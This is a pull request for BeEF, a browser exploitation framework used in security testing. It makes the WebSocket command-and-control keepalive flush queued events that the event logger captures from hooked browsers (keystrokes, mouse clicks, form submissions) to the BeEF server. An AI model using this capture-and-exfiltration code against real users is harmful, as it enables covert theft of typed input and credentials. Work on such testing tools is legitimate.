### PR TITLE
WebSockets: flush beef.net.queue during keepalive

### DIFF
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -7,7 +7,7 @@
 /**
  * Object in charge of getting new commands from the BeEF framework and execute them.
  * The XHR-polling channel is managed here. If WebSockets are enabled,
- * websocket.ls is used instead.
+ * websocket.js is used instead.
  * @namespace beef.updater
  */
 beef.updater = {

--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -84,6 +84,14 @@ beef.websocket = {
      * todo: there is probably a more efficient way to do this. Double-check WebSocket API.
      */
     alive: function (){
+        try {
+            if (beef.logger.running) {
+                beef.logger.queue();
+            }
+        } catch(err){}
+
+        beef.net.flush();
+
         beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
         setTimeout("beef.websocket.alive()", parseInt(beef.websocket.ws_poll_timeout));
     }

--- a/core/main/network_stack/websocket/websocket.rb
+++ b/core/main/network_stack/websocket/websocket.rb
@@ -24,7 +24,7 @@ module BeEF
         MOUNTS = BeEF::Core::Server.instance.mounts
 
         def initialize
-          return unless @@config.get('beef.websocket.enable')
+          return unless @@config.get('beef.http.websocket.enable')
 
           secure = @@config.get('beef.http.websocket.secure')
 

--- a/extensions/events/api.rb
+++ b/extensions/events/api.rb
@@ -6,22 +6,12 @@
 module BeEF
   module Extension
     module Events
-      module PostLoad
-        BeEF::API::Registrar.instance.register(BeEF::Extension::Events::PostLoad, BeEF::API::Extensions, 'post_load')
-
-        def self.post_load
-          print_error 'Event Logger extension is not compatible with WebSockets command and control channel' if BeEF::Core::Configuration.instance.get('beef.http.websocket.enable')
-        end
-      end
-
+      # Mounts the handler for processing browser events.
+      #
+      # @param beef_server [BeEF::Core::Server] HTTP server instance
       module RegisterHttpHandler
-        # Register API calls
         BeEF::API::Registrar.instance.register(BeEF::Extension::Events::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
 
-        #
-        # Mounts the http handlers for the events extension. We use that to retrieve stuff
-        # like keystroke, mouse clicks and form submission.
-        #
         def self.mount_handler(beef_server)
           beef_server.mount('/event', BeEF::Extension::Events::Handler)
         end

--- a/extensions/events/extension.rb
+++ b/extensions/events/extension.rb
@@ -9,10 +9,8 @@ module BeEF
       extend BeEF::API::Extension
 
       @short_name = 'events_logger'
-
-      @full_name = 'events logger'
-
-      @description = 'registers mouse clicks, keystrokes, form submissions'
+      @full_name = 'Event Logger'
+      @description = 'Logs browser events, such as mouse clicks, keystrokes, and form submissions.'
     end
   end
 end


### PR DESCRIPTION
Fixes #1570.

This isn't ideal, but it will do for now. The entire WebSocket command and control functionality requires review.
